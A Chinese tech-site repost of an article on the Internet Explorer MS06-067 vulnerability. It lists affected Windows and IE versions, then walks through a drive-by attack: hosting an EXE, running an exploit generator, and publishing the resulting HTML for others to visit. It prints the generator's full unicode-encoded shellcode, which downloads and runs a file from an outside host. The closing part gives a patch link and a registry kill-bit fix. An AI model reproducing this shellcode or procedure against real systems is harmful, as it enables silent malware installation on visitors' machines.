作家
登录

令人汗颜的IE最新漏洞(MS06-067)测试

作者: 来源: 2012-06-12 23:23:51 阅读 我要评论

这个漏洞太恐怖了,恐怖的让我不敢写出来,考虑到马上网上这样的工具都会泛滥,还是提前告诉大家比较好,我不详细的利用过程,如果你接触过类似的,肯定是会使用的,再次奉劝大家,测试为主,不要乱挂马,危害他人!

受影响的系统:

Microsoft Windows 2000 Service Pack 4

Microsoft Windows XP Service Pack 2

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003

Microsoft Windows Server 2003 Service Pack 1

Microsoft Windows Server 2003(用于基于 Itanium 的系统)

Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)

Microsoft Windows Server 2003 x64 Edition

受影响软件:

Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP4

不受影响软件:

Internet Explorer 7

利用过程如下,

1、首先把一个你需要运行的EXE文件放在网上,得到地址: http://www.1steam.cn/tools/jhzj.exe(我这里测试用的是按钮突破专家)。

2、接着看下这个生成工具(LION提供的,谢)的使用方法:

Usage: e:/ms_exp/06067/ms06067.exe [htmlfile]--就是你的EXE的路径,如我这里的“按钮突破专家”的地址:

[htmlfile]--需要生成的HTML文件的名称,如我这里的1st.html

3、生成过程,按照上面的格式就可以生成了,过程如下:

E:Ms_exp6067>ms06067 http://www.1steam.cn/tools/jhzj.exe 1st.html[+] download url:http://www.1steam.cn/tools/jhzj.exe[+] exploit file:1st.html"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c""%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000""%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516""%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456""%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300""%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856""%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56""%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be""%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775""%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd""%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e""%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a""%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574""%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a""%u652e%u6578%u0000";[+] exploit write to 1st.html success!

看到这句:[+] exploit write to 1st.html success!就说明成功了。可以去ms06067.exe的目录下,看到生成的HTML文件1st.html。

4、把这个HTML文件放在网上,给人家访问就可以了,我这里的这个测试网页地址在:

http://www.1steam.cn/modiy/1st.html ,你可以打开看看效果,如果你能看到运行的“按钮突破专家”,说明成功。

5、修补

官方已经除了补丁,地址在:http://www.microsoft.co.ke/china ... letin/MS06-067.mspx。

或者修补如下(LION提供的,再谢):

请将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]"Compatibility Flags"=dword:00000400

双击此.reg文件将其应用到各个系统。


  推荐阅读

  Windows操作系统PWS的漏洞的防范措施

现在还有许多政府机关里的电脑上使用的是Windows98操作系统,里面的PWS漏洞是利用安装PWS后,系统安装在 windows/system/inetsrv/iisadmin/publish目录里的welcome.ASP文件 来查看硬盘里的数据。只要PWS安装在C:,在>>>详细阅读


本文标题:令人汗颜的IE最新漏洞(MS06-067)测试

地址:http://www.17bianji.com/anquan/buding/2858.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)